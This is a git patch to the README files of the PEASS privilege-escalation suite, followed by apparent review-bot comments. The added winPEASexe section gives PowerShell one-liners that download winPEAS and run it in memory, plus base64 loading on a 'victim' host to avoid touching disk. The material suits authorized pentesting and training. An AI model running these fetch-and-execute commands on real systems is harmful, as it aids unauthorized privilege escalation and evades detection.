From f2b66bc711783ae3e34cd8655566e332502df363 Mon Sep 17 00:00:00 2001 From: kali Date: Tue, 16 Feb 2021 10:13:02 -0500 Subject: [PATCH] winPEASv2 --- .github/FUNDING.yml | 2 +- README.md | 2 +- linPEAS/README.md | 2 +- winPEAS/README.md | 2 +- winPEAS/winPEASbat/README.md | 4 +++ winPEAS/winPEASexe/README.md | 49 ++++++++++++++++++++++++++++++++++-- 6 files changed, 55 insertions(+), 6 deletions(-) diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml index bcd9c6d..4cb452d 100644 --- a/.github/FUNDING.yml +++ b/.github/FUNDING.yml @@ -1 +1 @@ -custom: ['https://www.buymeacoffee.com/carlospolop'] +custom: ['https://www.patreon.com/peass'] diff --git a/README.md b/README.md index e1702dc..335082c 100755 --- a/README.md +++ b/README.md @@ -22,7 +22,7 @@ If you want to **add something** and have **any cool idea** related to this proj ## Please, if this tool has been useful for you consider to donate -[![Buy me a coffee](https://camo.githubusercontent.com/031fc5a134cdca5ae3460822aba371e63f794233/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67)](https://www.buymeacoffee.com/carlospolop) +[![paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.patreon.com/peass) ## Looking for a useful Privilege Escalation Course? diff --git a/linPEAS/README.md b/linPEAS/README.md index ef43e94..1331c52 100755 --- a/linPEAS/README.md +++ b/linPEAS/README.md 
@@ -295,7 +295,7 @@ If you want to **add something** and have **any cool idea** related to this proj ## Please, if this tool has been useful for you consider to donate -[![Buy me a coffee](https://camo.githubusercontent.com/031fc5a134cdca5ae3460822aba371e63f794233/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67)](https://www.buymeacoffee.com/carlospolop) +[![paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.patreon.com/peass) ## Looking for a useful Privilege Escalation Course? diff --git a/winPEAS/README.md b/winPEAS/README.md index 477dcfb..62369dc 100755 --- a/winPEAS/README.md +++ b/winPEAS/README.md @@ -16,7 +16,7 @@ If you want to **add something** and have **any cool idea** related to this proj ## Please, if this tool has been useful for you consider to donate -[![paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=DED2HWDYLFT2C&source=url) +[![paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.patreon.com/peass) ## Looking for a useful Privilege Escalation Course? diff --git a/winPEAS/winPEASbat/README.md b/winPEAS/winPEASbat/README.md index 974319b..cf3a656 100755 --- a/winPEAS/winPEASbat/README.md +++ b/winPEAS/winPEASbat/README.md 
@@ -129,6 +129,10 @@ This is the kind of outpuf that you have to look for when usnig the winPEAS.bat [More info about icacls here](https://ss64.com/nt/icacls.html) +## Please, if this tool has been useful for you consider to donate + +[![paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.patreon.com/peass) + ## Let's improve PEASS together If you want to **add something** and have **any cool idea** related to this project, please let me know it in the **telegram group https://t.me/peass** or using **[github issues](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues)** and we will update the master version. diff --git a/winPEAS/winPEASexe/README.md b/winPEAS/winPEASexe/README.md index 20cc31a..508ee09 100755 --- a/winPEAS/winPEASexe/README.md +++ b/winPEAS/winPEASexe/README.md 
@@ -12,7 +12,47 @@ Check also the **Local Windows Privilege Escalation checklist** from **[book.hac **.Net >= 4.5 is required** -Download the **[latest obfuscated version from here](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe/winPEAS/bin/Obfuscated%20Releases)** or **compile it yourself** (read instructions for compilation). +Precompiled binaries: +- Download the **[latest obfuscated version from here](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe/winPEAS/binanries/Obfuscated%20Releases)** or **compile it yourself** (read instructions for compilation). +- Non-Obfuscated [winPEASany.exe](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASexe/binaries/Release/winPEASany.exe) +- Non-Obfuscated [winPEASx64.exe](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASexe/binaries/x64/Release/winPEASx64.exe) +- Non-Obfuscated [winPEASx86.exe](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe) + +```bash +#One liner to download and execute winPEASany from memory in a PS shell +$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/binaries/Release/winPEASany.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("") + +#Before cmd in 3 lines +$url = "https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/binaries/Release/winPEASany.exe" +$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); +[winPEAS.Program]::Main("") #Put inside the quotes the winpeas parameters you want to use + +#Load from disk 
in memory and execute: +$wp = [System.Reflection.Assembly]::Load([byte[]]([IO.File]::ReadAllBytes("D:\Users\victim\winPEAS.exe"))); +[winPEAS.Program]::Main("") #Put inside the quotes the winpeas parameters you want to use + +#Load from disk in base64 and execute +##Generate winpeas in Base64: +[Convert]::ToBase64String([IO.File]::ReadAllBytes("D:\Users\user\winPEAS.exe")) | Out-File -Encoding ASCII D:\Users\user\winPEAS.txt +##Now upload the B64 string to the victim inside a file or copy it to the clipboard + + ##If you have uploaded the B64 as afile load it with: +$thecontent = Get-Content -Path D:\Users\victim\winPEAS.txt + ##If you have copied the B64 to the clipboard do: +$thecontent = "aaaaaaaa..." #Where "aaa..." is the winpeas base64 string +##Finally, load binary in memory and execute +$wp = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($thecontent)) +[winPEAS.Program]::Main("") #Put inside the quotes the winpeas parameters you want to use + +#Loading from file and executing a winpeas obfuscated version +##Load obfuscated version +$wp = [System.Reflection.Assembly]::Load([byte[]]([IO.File]::ReadAllBytes("D:\Users\victim\winPEAS-Obfuscated.exe"))); +$wp.EntryPoint #Get the name of the ReflectedType, in obfuscated versions sometimes this is different from "winPEAS.Program" +[]::Main("") #Used the ReflectedType name to execute winpeas +``` + +## Parameters + ```bash winpeas.exe #run all checks (except for additional slower checks - LOLBAS and linpeas.sh in WSL) (noisy - CTFs) winpeas.exe systeminfo userinfo #Only systeminfo and userinfo checks executed 
@@ -20,7 +60,8 @@ winpeas.exe notcolor #Do not color the output winpeas.exe wait #wait for user input between tests winpeas.exe debug #display additional debug information winpeas.exe log #log output to out.txt instead of standard output -winpeas.exe -lolbas -linpeas=http://127.0.0.1/linpeas.sh #execute also additional LOLBAS search check and linpeas check (runs linpeas.sh in default WSL distribution) with custom linpeas.sh URL (if not provided, the default URL is: https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh) +winpeas.exe -linpeas=http://127.0.0.1/linpeas.sh #Execute also additional linpeas check (runs linpeas.sh in default WSL distribution) with custom linpeas.sh URL (if not provided, the default URL is: https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh) +winpeas.exe -lolbas #Execute also additional LOLBAS search check ``` ## Basic information @@ -216,6 +257,10 @@ If you find any issue, please report it using **[github issues](https://github.c **WinPEAS** is being **updated** every time I find something that could be useful to escalate privileges. +## Please, if this tool has been useful for you consider to donate + +[![paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.patreon.com/peass) + ## Advisory All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
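Review bot: In the README.md hunk (and the same edit repeated in linPEAS/README.md, winPEAS/README.md, the new section in winPEASbat/README.md and the new section at the end of winPEASexe/README.md) the badge is PayPal's `btn_donateCC_LG.gif` with alt text `paypal`, but the link target is now `https://www.patreon.com/peass`. A PayPal-branded button that opens Patreon is misleading, and the image is hotlinked from paypalobjects.com, so it can change or disappear independently of this repo. Suggest a plain text link such as `[Support PEASS on Patreon](https://www.patreon.com/peass)` or a Patreon badge with matching alt text, applied consistently in all five files.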
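Review bot: In the winPEASexe/README.md hunk at `@@ -12,7 +12,47 @@`, `[winPEAS.Program]::Main("")` does not pass an empty argument list; PowerShell wraps the string into a one-element `string[]` containing `""`, and the comment "Put inside the quotes the winpeas parameters you want to use" invites `Main("systeminfo userinfo")`, which arrives as the single argument `"systeminfo userinfo"` rather than two. Suggest `[winPEAS.Program]::Main([string[]]@())` for the default run and `[winPEAS.Program]::Main(@("systeminfo","userinfo"))` for selected checks, and reword the comment to say the parameters go in as separate array elements. In the obfuscated-version block, `[]::Main("")` is not valid PowerShell; either mark the type as a placeholder (`[<ReflectedType>]::Main(...)`) or sidestep the renamed type entirely with `$wp.EntryPoint.Invoke($null, @(,[string[]]@()))`, which works whatever the obfuscator called the class. The obfuscated-release link points at `winPEAS/winPEASexe/winPEAS/binanries/Obfuscated%20Releases` ("binanries"), which matches neither the old `winPEAS/winPEASexe/winPEAS/bin/...` path nor the `winPEAS/winPEASexe/binaries/...` path used by the three non-obfuscated links right below it, so it will 404; please align it with the `binaries/` path. Minor: the x86 link uses `/tree/master/` for a file while the other two use `/blob/master/`; `##If you have uploaded the B64 as afile` should read `as a file`; and `#Before cmd in 3 lines` is unclear (something like `#The same one-liner split in 3 lines`).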
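Review bot: In the `@@ -20,7 +60,8 @@` hunk, listing `-linpeas=` and `-lolbas` on separate lines reads as if they are alternatives, whereas the removed line showed them combined; add a line or comment stating that both can be given together (`winpeas.exe -lolbas -linpeas=http://127.0.0.1/linpeas.sh`). The `-linpeas` description should also say plainly that the URL is downloaded and executed inside the default WSL distribution at run time, so with the default `raw.githubusercontent.com` URL the target makes an outbound connection to GitHub during the engagement; the `http://127.0.0.1/linpeas.sh` form is the way to avoid that and is worth calling out as the recommended option rather than only as an example.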